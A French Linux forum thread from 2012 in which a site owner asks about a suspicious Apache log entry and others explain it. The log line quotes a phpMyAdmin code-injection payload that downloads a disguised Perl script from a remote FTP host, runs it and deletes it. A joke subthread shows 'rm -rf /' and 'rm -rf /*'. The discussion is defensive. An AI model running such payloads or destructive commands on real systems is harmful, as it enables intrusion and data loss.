Forum Linux.général Drôle de requête sur mon site web - ça sent le pirate

Posté par .
Tags : aucun
5
29
fév.
2012

Bonjour,

Je ne sais pas si je poste au bon endroit… Quoi qu'il en soit, j'ai trouvé dans mes logs apache ce qui suit :

"GET /phpmyadmin/index.phpconfig/config.inc.php?eval=system('echo cd /tmp;wget ftp://testing:testing@x.x.x.x/apache_32.png;mv apache_32.png -O p2.txt;curl -O ftp://testing:testing@x.x.x.x/apache_32.png;mv apache_32.png;mv apache_32.png p.txt;lynx -DUMP ftp://testing:testing@x.x.x.x/apache_32.png;mvapache_32.png >p3.txt;perl p.txt;perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 521 "-" "curl/7.18.2 (x86_64-pc-linux-gnu)libcurl/7.18.2 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.8 libssh2/0.18"

Qui aurait la gentillesse de m'expliquer ce que le gars a voulu faire (a fait) ?

En tout cas ça fait peur. Une info supplémentaire : la requête est exécutée par une autre adresse que celle que j'ai remplacé par "x.x.x.x".

Merci d'avance de vos infos

  • # we are under attack !

    Posté par . Évalué à 4.

    Du classique : tentative de telechargement par différent moyen d'un code perl.

    http://blog.spiderlabs.com/2012/02/honeypot-alert-phpmyadmin-code-injection-attacks.html

  • # wget

    Posté par . Évalué à 5.

    Récupères le .png et t'auras le code perl.

    A noter qu'il te faut contacter l'abuse au niveau du serveur qui héberge le png, car il est aussi compromis. (la raison de l'obfuscation du code en .png !)

    • [^] # Re: wget

      Posté par . Évalué à 4.

      Faut contacter deux abuse, en fait :

      • Celui de l'@IP qui a envoyé cette requête,
      • Celui du serveur qui héberge le perl déguisé en png.

      THIS IS JUST A PLACEHOLDER. YOU SHOULD NEVER SEE THIS STRING.

  • # erreur 404

    Posté par (page perso) . Évalué à 3.

    Donc ça a échoué.

    Système - Réseau - Sécurité Open Source

    • [^] # Re: erreur 404

      Posté par . Évalué à 2. Dernière modification le 29/02/12 à 14:12.

      J'aimerai autant que ça ait échoué :-) c'est mon pauv petit serveur à moué

      En tout cas, merci à vous pour les infos parce que j'ai quand même du mal à lire les logs.

  • # Note pour plus tard ...

    Posté par (page perso) . Évalué à 1.

    Ne jamais garder les urls par défaut des appli web (remplacer /phpmydadmin par adminSQL par exemple). C'est de la sécurité par obscurité, mais ça protège pas mal des bots à l'origine de ce genre d'attaque.

    • [^] # Re: Note pour plus tard ...

      Posté par . Évalué à 2.

      Pfff.. Tu n'es vraiment pas assez parano. Il faut remplacer l'URL par défaut par un truc du genre /Yapmin50L pour être tranquille :)

    • [^] # Re: Note pour plus tard ...

      Posté par . Évalué à 3.

      c'est une bonne idée d'ailleurs je vais de ce pas renommer tous les utilitaire par défaut
      ln => zelda (bah oui link c'est le héros)
      ls => ln
      rm => ls
      cd => du
      et ainsi de suite … Mouhahahahahahahaha

      Il ne faut pas décorner les boeufs avant d'avoir semé le vent

      • [^] # Re: Note pour plus tard ...

        Posté par . Évalué à 1.

        Petit joueur
        ln => rm -rf /
        ls => rm -rf /
        rm => rm -rf /
        cd => rm -rf /
        Même pas peur

        • [^] # Re: Note pour plus tard ...

          Posté par . Évalué à 3.

          oui, petit joueur rm -rf / ne fait rien le système te préviens qu'il ne peut détruire /
          rm -rf /* ça c'est plus rigolo ;)

          Il ne faut pas décorner les boeufs avant d'avoir semé le vent

        • [^] # Re: Note pour plus tard ...

          Posté par . Évalué à 1.

          C'est marrant ça : pour ln, ls, rm on a à chaque fois la première et la troisième lettre de respectivement link, list, remove.

          Donc cd aurait dû être cr.

          • [^] # Re: Note pour plus tard ...

            Posté par . Évalué à 4.

            Depuis quand le r est la troisième lettre de "change" ("change directory", voir chdir(2)) ?

            • [^] # Re: Note pour plus tard ...

              Posté par (page perso) . Évalué à 1.

              3eme lettre de directory ?

              Système - Réseau - Sécurité Open Source

              • [^] # Re: Note pour plus tard ...

                Posté par (page perso) . Évalué à 2.

                Je dirais plutôt que c'est les deux premières consonnes du mot. Ça doit être lié au fait que les consonnes contiennent plus d'informations sur le mot final que les voyelles :-)

                (ou alors c'est juste que les gars se sont pas posés de questions)

Suivre le flux des commentaires

Note : les commentaires appartiennent à ceux qui les ont postés. Nous n'en sommes pas responsables.